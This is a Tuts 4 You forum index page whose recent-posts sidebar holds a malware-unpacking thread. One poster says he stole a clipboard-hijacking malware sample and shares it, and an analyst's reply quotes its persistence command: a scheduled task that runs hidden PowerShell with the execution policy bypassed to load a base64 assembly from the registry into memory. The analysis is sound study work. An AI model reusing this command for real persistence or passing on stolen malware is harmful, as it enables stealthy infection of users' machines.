Jump to content
Tuts 4 You

Forums

  1. Community Discussions

    1. Terms, Privacy Policy & Frequently Asked Questions   (151,071 visits to this link)

      Very important! Please read before sign up and posting...

    2. General Discussions and Off Topic

      General and off-topic conversations and discussions here...

      12.9k
      posts
    3. Artscene Community

      Share graphic, ASCII, module, demo, intro ideas and works...

      7.4k
      posts
    4. Site Bug Reports and Feedback

      Bugs, feedback and ideas regarding this site...

      2.2k
      posts
  2. Reverse Code Engineering

    1. Challenge of Reverse Engineering

      Try a challenge or contribute your own, any platform or operating system...

      13.3k
      posts
    2. Hardware Reverse Engineering

      Reverse engineering of circuitry hardware and firmware...

      191
      posts
    3. Network Security

      Discussions on network security, holes, exploits and other issues...

      454
      posts
    4. Malware Reverse Engineering

      Debugging, disassembling and documenting interesting malware...

      1.5k
      posts
    5. Reverse Engineering Articles

      Share an interesting blog, news page or other RE related site...

      1.9k
      posts
    6. Employment and Careers

      Discussions on employment and career paths in the industry...

      157
      posts
  3. Developers Forums

    1. Programming and Coding

      Programming and coding tips, help and solutions...

      12k
      posts
    2. Programming Resources

      Share an interesting blog, news page or other resource...

      307
      posts
    3. Software Security

      Securing your software against reverse engineering...

      764
      posts
  4. Community Projects

    1. Scylla Imports Reconstruction

      Development and support forum for the Scylla project...

      497
      posts
    2. x64dbg

      An open-source x64/x32 debugger for windows...

      1.2k
      posts
    3. Future Community Projects

      Looking for support and interested partners for a future project?

      130
      posts
    4. Community Projects Archive

      Old and inactive projects moved to long term support...

      803
      posts
  • Member Statistics

    15,268
    Total Members
    7,713
    Most Online
    daredevil
    Newest Member
    daredevil
    Joined
  • Posts

    • BlackHat
      Unpacked this Crap LOL   Here You go with the File. Kthmngiucgrhcdpxszzwg_BH_unp.dll
    • JoseCmanXDll
      yep he tried to bypass windows defender to make payload run on memory there by converting his payload to base64 i see. ( based on powershell command ) with those strong packers i dont think its possible to unpack crap 
    • Apuromafo
      some simple only for  analisis: step 0:  exe in dnspy   step 1: resource extract and save as .zip step 2: .exe in that zip, is the program(malware ) dll  in .net packed with Microsoft Visual C# / Basic.NET  - * IntelliLock v.1.5.x.0 ( .NET Reactor* )  (Kthmngiucgrhcdpxszzwg.dll)  there is executed with some like this:   C:\Windows\System32\schtasks.exe" /create /sc minute /mo 10 /tn Fvupm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)" virustotal: https://www.virustotal.com/gui/file/5694a409003d8f855a17761d9ebce7cfd0f30490fa5340d9a3e1b55ce75cd5be/behavior   Processes Created C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null) Shell Commands schtasks /create /sc minute /mo 10 /tn Fvupm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)" Processes Terminated C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null) Processes Tree 2120 - Unpack me.exe 2628 - C:\Windows\System32\schtasks.exe /create /sc minute /mo 10 /tn Fvupm /tr powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null) packer? vmprotect +intellilock , or some ofuscator like ILProtector +intellilock    Best regards Apuromafo  
    • JoseCmanXDll
      this malware belongs to some famous coders he sell it for over (100$) i somehow managed to steal it from someone who bought it its a malware it uses power shell, it only access clipboard to replace it but dosent steal data i dont know more about it. the packer had me so much confused unpack if u can. edit: if it got unpacked i will share the seller website! Unpack me.rar
    • LCF-AT
      Hi again, just have some more little questions about the firewall rules.So as I see it right then I just need to create 2 new rules to BLOCK all IN & OUT going connection as I post one post before above. It seems that I also need to change the Firewall settings itself for all domains what means I have 1) enable the Firewall and 2) setting the In&Out Bounds connection settings to block.Maybe its just optional so I'am not sure yet about whether its just enough to ENABLE Firewall & Creating my 2 rules which should block all. Now I was looking how I can find out the firewall settings to backup them before I change it.As I see it right then I can read them from registry and change them there. ... So that means I can read the parameters from registry of all 3 domains I can backup so far.So my question now is whether I "must or not" change the main IN & OUT Bound paramters (to any state) IF I have created a own block rule?Its a bit contfusing a little.Lets say I just enable the firewall for all domains and the In&Out settings above are set to allowed BUT I have created a In&Out rule to Block All.What happens then?Otherwise when I set the InBound setting to Block All then I also don't need to create a rule for In Bounds.So at the end I just wanna Block all In&Out connections and then restoring the original state back.If anyone has some more hints how the settings here must be set correctly to Block ALL (In/out/under/over/whatever directions are comming from) then just tell me. PS: Does it play a role whether I enable the Firewall with netsh command (CreateProcess/Cmd) or changing directly in registry (using Reg functions to set)?I must use the reg functions to read the states. greetz
  • File Comments

  • Downloads

×
×
  • Create New...